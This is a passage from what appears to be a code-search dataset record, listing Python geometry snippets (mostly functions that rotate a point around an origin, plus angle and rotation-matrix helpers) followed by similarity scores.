ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle): # Library export\r\n ox, oy = origin\r\n px, py = point\r\n\r\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\r\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\r\n return (qx, qy)", "def axisangle2matrix(angle, direction, point=None):\r\n sina = math.sin(angle)\r\n cosa = math.cos(angle)\r\n direction = unit_vector(direction[:3])\r\n # rotation matrix around unit vector\r\n R = numpy.diag([cosa, cosa, cosa])\r\n R += numpy.outer(direction, direction) * (1.0 - cosa)\r\n direction *= sina\r\n R += numpy.array([[ 0.0, -direction[2], direction[1]],\r\n [ direction[2], 0.0, -direction[0]],\r\n [-direction[1], direction[0], 0.0]])\r\n M = numpy.identity(4)\r\n M[:3, :3] = R\r\n if point is not None:\r\n # rotation not around origin\r\n point = numpy.array(point[:3], dtype=numpy.float64, copy=False)\r\n M[:3, 3] = point - numpy.dot(R, point)\r\n return M", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + np.math.cos(angle) * (px - ox) - np.math.sin(angle) * (py - oy)\n qy = oy + np.math.sin(angle) * (px - ox) + np.math.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + np.cos(angle) * (px - ox) - np.sin(angle) * (py - oy)\n qy = oy + np.sin(angle) * (px - ox) + np.cos(angle) * (py - oy)\n return qx, qy", "def atan2_vec(vector):\n return -np.arctan2(vector[1], vector[0])", "def dir_vect(theta):\n return np.array([np.cos(theta),np.sin(theta)])", "def transform2D(x: float, y: float, angle: float) -> np.array:\n c = np.cos(angle)\n s = np.sin(angle)\n return np.array([[c, -s, x], [s, c, y], [0.0, 0.0, 1.0]])", "def rotate(origin, point, angle):\n ox, oy = origin[0],origin[1]\n px, py = point[0],point[1]\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return [qx, qy]", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def invgeochart(w):\n # u = torch.asin(w[...,2])\n u = torch.acos(w[...,2])\n # v = torch.acos(w[...,0]/torch.cos(u))\n v = torch.atan(w[...,1]/w[...,0])\n return torch.stack((u,v+np.pi))", "def rotate(self, origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + np.cos(angle) * (px - ox) - np.sin(angle) * (py - oy)\n qy = oy + np.sin(angle) * (px - ox) + np.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle):\r\n ox, oy = origin\r\n px, py = point\r\n\r\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\r\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\r\n return (qx,qy)", "def point(pt, angle, dist):\n x, y = pt\n return dist * cos(angle) + x, dist * sin(angle) + y,", "def angle_from_point( x, img_width=640, fov_angle=44 ):\r\n return( -( ( img_width / 2 ) - x ) * fov_angle )", "def rotate(point, angle, origin=(0.0, 0.0)):\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def getUnitVector(self):\n return Vector.createFromPolar(1, self.angle)", "def vector_angle(v):\n assert len(v) == 2\n x, y = v\n return np.arctan2(y, x)", "def vToA( x, y, a ):\n if y == 0:\n # dangerous special case (avoids div by 0 in dx/dy)\n if x > 0:\n return math.pi * 0.5\n elif x < 0:\n return -math.pi * 0.5\n else:\n # don't change angle... previous is probably best\n return a\n else:\n # safe to use atan technique\n a = math.atan( x / y )\n if y < 0:\n # inverted\n a += math.pi\n return a", "def rotate(origin, point, angle):\n oy, ox = origin\n py, px = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qy, qx" ]
[ "0.6875712", "0.6629386", "0.6577215", "0.64005256", "0.6300734", "0.62850034", "0.61816216", "0.61778945", "0.6121601", "0.6113652", "0.61109966", "0.6102749", "0.6102427", "0.6094682", "0.6085306", "0.60775954", "0.60771406", "0.6071323", "0.6071323", "0.6071323", "0.60596865", "0.60535425", "0.6031343", "0.602143", "0.6018452", "0.60092634", "0.60062635", "0.60002244", "0.59965986", "0.59943545" ]
0.78936476
0